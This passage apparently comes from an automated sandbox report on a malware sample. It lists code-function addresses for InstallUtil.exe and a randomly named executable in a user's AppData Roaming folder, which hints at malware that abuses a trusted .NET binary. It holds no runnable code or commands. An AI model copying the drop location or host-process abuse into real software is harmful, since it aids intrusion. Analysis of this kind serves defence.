                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F1B85_2_0681F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C1E05_2_0681C1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C1F05_2_0681C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068109005_2_06810900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E9085_2_0681E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B9305_2_0681B930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B9405_2_0681B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B6E85_2_0684B6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068486085_2_06848608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684AA585_2_0684AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D6705_2_0684D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C3885_2_0684C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06848BF35_2_06848BF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B0A05_2_0684B0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684A4085_2_0684A408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D0285_2_0684D028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068400405_2_06840040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068411A05_2_068411A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C9D85_2_0684C9D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684BD385_2_0684BD38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845EB85_2_06845EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845EC85_2_06845EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B6D95_2_0684B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684560B5_2_0684560B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068456185_2_06845618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684AA485_2_0684AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845A605_2_06845A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D6615_2_0684D661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845A705_2_06845A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068433A85_2_068433A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068433B85_2_068433B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06846BC15_2_06846BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06846BD05_2_06846BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684A3F85_2_0684A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068463135_2_06846313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068463205_2_06846320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068437305_2_06843730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068467685_2_06846768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068467785_2_06846778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C3785_2_0684C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B08F5_2_0684B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068404885_2_06840488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068474975_2_06847497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068404985_2_06840498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068474A85_2_068474A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068408E05_2_068408E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068408F05_2_068408F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068478F05_2_068478F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068400075_2_06840007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068428075_2_06842807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068428185_2_06842818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D0185_2_0684D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068444305_2_06844430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068470405_2_06847040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068470505_2_06847050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684518F5_2_0684518F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068451985_2_06845198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068481A05_2_068481A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068481B05_2_068481B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C9C85_2_0684C9C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068485F85_2_068485F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068479005_2_06847900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684BD2F5_2_0684BD2F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06840D395_2_06840D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06840D485_2_06840D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06847D485_2_06847D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06847D585_2_06847D58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F23226_2_024F2322
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F20106_2_024F2010
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F0A586_2_024F0A58
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F0D216_2_024F0D21
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024FD2D06_2_024FD2D0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F16C56_2_024F16C5
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F20B16_2_024F20B1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F8F2B6_2_024F8F2B
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F8F386_2_024F8F38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F0D6A6_2_024F0D6A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F0DE16_2_024F0DE1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F12F66_2_024F12F6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_024F17C66_2_024F17C6
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B3142C6_2_05B3142C
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B300406_2_05B30040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B3C0486_2_05B3C048
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B345D86_2_05B345D8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B345C96_2_05B345C9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B356E06_2_05B356E0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B3C03A6_2_05B3C03A
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B300146_2_05B30014
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B3ABB16_2_05B3ABB1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05B3ABC06_2_05B3ABC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4CC886_2_05C4CC88
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4C1406_2_05C4C140
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4CC796_2_05C4CC79
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C454186_2_05C45418
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C454286_2_05C45428
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4CF856_2_05C4CF85
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4566E6_2_05C4566E
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C4C1316_2_05C4C131
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C5E1B06_2_05C5E1B0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C5A5486_2_05C5A548
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C54C386_2_05C54C38
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C5E1A16_2_05C5E1A1
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C5A5386_2_05C5A538
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C5BB4F6_2_05C5BB4F
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C808536_2_05C80853
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C97FB86_2_05C97FB8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C9C1006_2_05C9C100
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C9C4276_2_05C9C427
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C97FA96_2_05C97FA9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C98EC06_2_05C98EC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C98EB06_2_05C98EB0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C900066_2_05C90006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05C9D2F86_2_05C9D2F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05D100406_2_05D10040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05D100076_2_05D10007
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05F9DBE86_2_05F9DBE8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05F800406_2_05F80040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05F800066_2_05F80006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 6_2_05F9CF386_2_05F9CF38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090F0077_2_0090F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090C1907_2_0090C190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_009061087_2_00906108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090B3287_2_0090B328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090C4707_2_0090C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_009067307_2_00906730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090C7517_2_0090C751
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_009098587_2_00909858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00904AD97_2_00904AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090CA317_2_0090CA31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090BBD27_2_0090BBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090BEB07_2_0090BEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090B4F27_2_0090B4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090E5177_2_0090E517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0090E5287_2_0090E528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_009035707_2_00903570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060084607_2_06008460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06007D907_2_06007D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060000407_2_06000040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060038707_2_06003870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060011C07_2_060011C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600F6007_2_0600F600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600F6107_2_0600F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600C6387_2_0600C638
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600C6487_2_0600C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600CEEB7_2_0600CEEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600CEF87_2_0600CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600D7987_2_0600D798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600D7A87_2_0600D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600DC007_2_0600DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060004907_2_06000490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060004A07_2_060004A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E4A07_2_0600E4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E4B07_2_0600E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600B4D77_2_0600B4D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600B4E87_2_0600B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600ED507_2_0600ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06000D517_2_06000D51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06000D607_2_06000D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600ED607_2_0600ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600BD887_2_0600BD88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600BD987_2_0600BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600FA597_2_0600FA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600FA687_2_0600FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600CA907_2_0600CA90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600CAA07_2_0600CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600D3407_2_0600D340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600D3507_2_0600D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060073E87_2_060073E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600DBF17_2_0600DBF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060000077_2_06000007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E04B7_2_0600E04B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E0587_2_0600E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060038607_2_06003860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060008F07_2_060008F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E8F87_2_0600E8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060009007_2_06000900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600E9087_2_0600E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600B9307_2_0600B930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600B9407_2_0600B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600F1A97_2_0600F1A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060011B07_2_060011B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600F1B87_2_0600F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600C1E07_2_0600C1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0600C1F07_2_0600C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060386087_2_06038608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603AA587_2_0603AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603D6707_2_0603D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603B6E87_2_0603B6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603C3887_2_0603C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603A4087_2_0603A408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603D0287_2_0603D028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06038C517_2_06038C51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060304987_2_06030498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603B0A07_2_0603B0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603BD387_2_0603BD38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060311A07_2_060311A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603C9D87_2_0603C9D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060386037_2_06038603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603560B7_2_0603560B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060356187_2_06035618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603AA487_2_0603AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603D6627_2_0603D662
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06035A607_2_06035A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06035A707_2_06035A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06035EB87_2_06035EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06035EC87_2_06035EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603B6D97_2_0603B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060363137_2_06036313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060363207_2_06036320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060337307_2_06033730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060367687_2_06036768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060367787_2_06036778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603C3787_2_0603C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060333A87_2_060333A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060333B87_2_060333B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06036BC17_2_06036BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06036BD07_2_06036BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603A3F87_2_0603A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060328077_2_06032807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060300067_2_06030006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060328187_2_06032818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603D0187_2_0603D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060344307_2_06034430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060300407_2_06030040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060370497_2_06037049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060370507_2_06037050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060304887_2_06030488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603B08F7_2_0603B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060374977_2_06037497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060374A87_2_060374A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060308E07_2_060308E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060308F07_2_060308F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060378F07_2_060378F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060379007_2_06037900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603BD287_2_0603BD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06030D397_2_06030D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06030D487_2_06030D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06037D487_2_06037D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06037D587_2_06037D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603518B7_2_0603518B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060311917_2_06031191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060351987_2_06035198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060381A07_2_060381A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_060381B07_2_060381B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0603C9C87_2_0603C9C8
